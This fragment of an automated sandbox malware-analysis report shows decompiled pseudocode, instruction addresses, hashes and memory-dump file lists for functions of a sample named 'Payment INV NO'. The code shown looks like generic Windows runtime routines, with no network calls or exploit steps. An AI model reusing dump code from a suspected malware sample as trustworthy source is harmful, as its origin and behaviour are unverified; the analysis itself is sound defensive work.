							_t83 =  *0x1888628; // 0x0
							_t116 =  *0x188862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                          0x017bb94c
                                                          0x017bb956
                                                          0x017bb95c
                                                          0x017bb95e
                                                          0x017bb964
                                                          0x017bb969
                                                          0x017bb96d
                                                          0x017bb970
                                                          0x017bb974
                                                          0x017bb97a
                                                          0x017bbadf
                                                          0x017bbae2
                                                          0x017bbae4
                                                          0x017bbae6
                                                          0x017bbaf0
                                                          0x01802cb8
                                                          0x017bbaf6
                                                          0x017bbaf6
                                                          0x017bbaf6
                                                          0x017bbafd
                                                          0x017bbb1f
                                                          0x017bbb1f
                                                          0x017bbaff
                                                          0x017bbb00
                                                          0x017bbb03
                                                          0x017bbb03
                                                          0x017bbacb
                                                          0x017bbacf
                                                          0x017bbad0
                                                          0x017bbad1
                                                          0x017bbadc
                                                          0x017bbadc
                                                          0x017bb980
                                                          0x017bb988
                                                          0x017bb98b
                                                          0x017bb98d
                                                          0x017bb990
                                                          0x017bb993
                                                          0x017bb999
                                                          0x017bb99b
                                                          0x017bb9a1
                                                          0x017bb9a5
                                                          0x017bb9aa
                                                          0x017bb9b0
                                                          0x017bb9bb
                                                          0x017bb9c0
                                                          0x017bb9c3
                                                          0x017bb9ca
                                                          0x017bb9cc
                                                          0x017bb9cf
                                                          0x017bb9d3
                                                          0x017bb9d7
                                                          0x017bba94
                                                          0x017bba94
                                                          0x017bba98
                                                          0x017bbaa3
                                                          0x01802ccb
                                                          0x017bbaa9
                                                          0x017bbaa9
                                                          0x017bbaa9
                                                          0x017bbab1
                                                          0x01802cd5
                                                          0x01802cdd
                                                          0x01802cdd
                                                          0x017bbabb
                                                          0x017bbabc
                                                          0x017bbac2
                                                          0x017bbac3
                                                          0x017bbac6
                                                          0x00000000
                                                          0x017bb9dd
                                                          0x017bb9dd
                                                          0x017bb9e7
                                                          0x017bb9e7
                                                          0x017bb9ec
                                                          0x017bb9ec
                                                          0x017bb9f1
                                                          0x017bb9f5
                                                          0x017bb9fa
                                                          0x017bba00
                                                          0x017bba0c
                                                          0x017bba10
                                                          0x017bba10
                                                          0x017bba12
                                                          0x017bba18
                                                          0x00000000
                                                          0x00000000
                                                          0x017bbb26
                                                          0x017bbb26
                                                          0x017bba1e
                                                          0x017bba1e
                                                          0x017bba23
                                                          0x017bba25
                                                          0x017bba2c
                                                          0x017bba30
                                                          0x017bba35
                                                          0x017bba35
                                                          0x017bba41
                                                          0x017bba46
                                                          0x017bba4c
                                                          0x017bba50
                                                          0x017bba54
                                                          0x017bba6a
                                                          0x017bba6e
                                                          0x017bba70
                                                          0x017bba74
                                                          0x017bba78
                                                          0x017bba7a
                                                          0x017bba7c
                                                          0x017bba8e
                                                          0x017bba90
                                                          0x017bba92
                                                          0x017bbb14
                                                          0x017bbb14
                                                          0x017bbb16
                                                          0x017bbb16
                                                          0x00000000
                                                          0x017bba7c
                                                          0x017bbb0a
                                                          0x017bbb0d
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017bbb0f

                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017BB9A5
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID:
                                                          • API String ID: 885266447-0
                                                          • Opcode ID: 2653f564093aacb077f43ad57fdfaa705475b5d2fdd2d04e3f958c1c040c569d
                                                          • Instruction ID: 2cf76eb7e9b84cfa6be9227d99fe95a3c99ce6f16fee6056b5ef0df8122fbce1
                                                          • Opcode Fuzzy Hash: 2653f564093aacb077f43ad57fdfaa705475b5d2fdd2d04e3f958c1c040c569d
                                                          • Instruction Fuzzy Hash: AC515471A08301CFC721CF6CC4C4A6AFBE9FB88600F54896EEA8597385D770E944CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017B0050 Relevance: 1.6, APIs: 1, Instructions: 81timeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 53%
                                                          			E017B0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x188d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E017C9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E017DB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						L01868A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E017C9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x188b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                          0x017b0055
                                                          0x017b005d
                                                          0x017b0062
                                                          0x017b006c
                                                          0x017b006f
                                                          0x017b0074
                                                          0x017b007a
                                                          0x017b007a
                                                          0x017b0080
                                                          0x017b0080
                                                          0x017b0087
                                                          0x017b008d
                                                          0x017b008f
                                                          0x017b0093
                                                          0x017b0095
                                                          0x017b009b
                                                          0x017b00f8
                                                          0x017b00fb
                                                          0x017b00fc
                                                          0x017b00ff
                                                          0x017b0108
                                                          0x017b0108
                                                          0x017b00a2
                                                          0x017b00a6
                                                          0x017b00b3
                                                          0x017b00bc
                                                          0x017b00c5
                                                          0x017b00ca
                                                          0x017fc01e
                                                          0x00000000
                                                          0x00000000
                                                          0x017fc02d
                                                          0x017b00d5
                                                          0x017b00d9
                                                          0x017fc03d
                                                          0x017fc046
                                                          0x017fc046
                                                          0x017b00df
                                                          0x017b00e2
                                                          0x017b00ea
                                                          0x017b00ef
                                                          0x017b00f2
                                                          0x017b00f6
                                                          0x017b0111
                                                          0x017b0117
                                                          0x017b0117
                                                          0x00000000
                                                          0x017b00f6
                                                          0x017b00d0
                                                          0x017b00d0
                                                          0x00000000

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: b92688de5f90d8d4a3077ade2ee00eb3bb24c6db2f95a1816d275ba8d7ffe073
                                                          • Instruction ID: a38b6755cc37eb0afda9f8728818c3f7ca6c895a83323c1310d9920ad82a5822
                                                          • Opcode Fuzzy Hash: b92688de5f90d8d4a3077ade2ee00eb3bb24c6db2f95a1816d275ba8d7ffe073
                                                          • Instruction Fuzzy Hash: B0317A31201B048FD726CF28C884B9BF7F5FB89714F14466DE59A87A90EB35A801CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017AFC01 Relevance: 1.6, APIs: 1, Instructions: 59timeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 93%
                                                          			E017AFC01(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t22;
				char* _t23;
				signed char* _t30;
				char _t37;
				void* _t44;
				intOrPtr _t46;
				void* _t47;

				_push(0x14);
				_push(0x186fbd0);
				E017ED08C(__ebx, __edi, __esi);
				_t46 = __edx;
				 *((intOrPtr*)(_t47 - 0x20)) = __edx;
				_t44 = __ecx;
				_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t22 != 0) {
					if( *_t22 == 0) {
						goto L1;
					}
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					L2:
					if( *_t23 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L3;
						}
						if(E017B7D50() == 0) {
							_t30 = 0x7ffe0385;
						} else {
							_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t30 & 0x00000020) == 0) {
							goto L3;
						}
						_t37 = 0;
						L01817016(0x14a3, _t46, 0,  *((intOrPtr*)(_t47 + 8)), 0, 0);
						L4:
						 *((char*)(_t47 - 0x19)) = _t37;
						 *((intOrPtr*)(_t47 - 4)) = _t37;
						 *((intOrPtr*)(_t47 - 0x24)) = 1;
						L017DB7CD();
						 *((char*)(_t47 - 0x19)) = E017D94B0(_t44, _t46,  *((intOrPtr*)(_t47 + 8)),  *((intOrPtr*)(_t47 + 0xc)));
						 *((intOrPtr*)(_t47 - 4)) = 0xfffffffe;
						 *((intOrPtr*)(_t47 - 0x24)) = 0;
						E017AFC77(_t37, _t46);
						return E017ED0D1( *((intOrPtr*)(_t47 - 0x19)));
					}
					L3:
					_t37 = 0;
					goto L4;
				}
				L1:
				_t23 = 0x7ffe0384;
				goto L2;
			}










                                                          0x017afc01
                                                          0x017afc03
                                                          0x017afc08
                                                          0x017afc0d
                                                          0x017afc0f
                                                          0x017afc12
                                                          0x017afc1a
                                                          0x017afc1f
                                                          0x017fbe4d
                                                          0x00000000
                                                          0x00000000
                                                          0x017fbe5c
                                                          0x017afc2a
                                                          0x017afc2d
                                                          0x017fbe73
                                                          0x00000000
                                                          0x00000000
                                                          0x017fbe80
                                                          0x017fbe92
                                                          0x017fbe82
                                                          0x017fbe8b
                                                          0x017fbe8b
                                                          0x017fbe9a
                                                          0x00000000
                                                          0x00000000
                                                          0x017fbea0
                                                          0x017fbeaf
                                                          0x017afc35
                                                          0x017afc35
                                                          0x017afc38
                                                          0x017afc3b
                                                          0x017afc44
                                                          0x017afc56
                                                          0x017afc59
                                                          0x017afc60
                                                          0x017afc67
                                                          0x017afc74
                                                          0x017afc74
                                                          0x017afc33
                                                          0x017afc33
                                                          0x00000000
                                                          0x017afc33
                                                          0x017afc25
                                                          0x017afc25
                                                          0x00000000

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: dd1d34f9a50d16c14e70f2954ee0aeb13304e7d611b0f654754f81b4a4bda49d
                                                          • Instruction ID: 652a93c57772854d0af508d2263f5a8468c018a6505e25bf1f0fd98e404854ff
                                                          • Opcode Fuzzy Hash: dd1d34f9a50d16c14e70f2954ee0aeb13304e7d611b0f654754f81b4a4bda49d
                                                          • Instruction Fuzzy Hash: 1721A231600689DFE7269FADC858BAEFBB4EF58788F044199EA009B3A1C7748941C761
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0179C962 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 42%
                                                          			E0179C962(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				intOrPtr _t22;
				void* _t26;
				void* _t27;
				void* _t32;
				intOrPtr _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x188d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E017AEEF0(0x18870a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(L0181F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E017AEB70(_t29, 0x18870a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E017DB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = L0181F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x18870c0; // 0x0
					while(_t38 != 0x18870c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x188b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                          0x0179c96a
                                                          0x0179c974
                                                          0x0179c988
                                                          0x0179c98a
                                                          0x01807c9d
                                                          0x01807c9f
                                                          0x01807ca4
                                                          0x01807cae
                                                          0x01807cf0
                                                          0x01807cf5
                                                          0x01807cfa
                                                          0x0179c992
                                                          0x0179c996
                                                          0x0179c997
                                                          0x0179c998
                                                          0x0179c9a3
                                                          0x0179c9a3
                                                          0x01807cb0
                                                          0x01807cb7
                                                          0x01807cbb
                                                          0x00000000
                                                          0x00000000
                                                          0x01807cbd
                                                          0x01807ce8
                                                          0x01807cc5
                                                          0x01807cc8
                                                          0x01807cca
                                                          0x01807cd0
                                                          0x01807cd6
                                                          0x01807cde
                                                          0x01807ce4
                                                          0x01807ce4
                                                          0x01807cd0
                                                          0x00000000
                                                          0x01807ce8
                                                          0x0179c990
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ed55b962798c3ba5a25e3f45ddc7273e82f71e0655f2dc1c9fa667fe4a15f9c0
                                                          • Instruction ID: a0a5bce045b6a0ebbac8eed5e58d6db3724440da59e1709944d6836cc67bea2b
                                                          • Opcode Fuzzy Hash: ed55b962798c3ba5a25e3f45ddc7273e82f71e0655f2dc1c9fa667fe4a15f9c0
                                                          • Instruction Fuzzy Hash: BD11E53230060A9BC762AF2CDC8592BB7F5BBC5710B200529E985C3691DF20FE15CBD1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01797055 Relevance: 1.5, APIs: 1, Instructions: 43timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
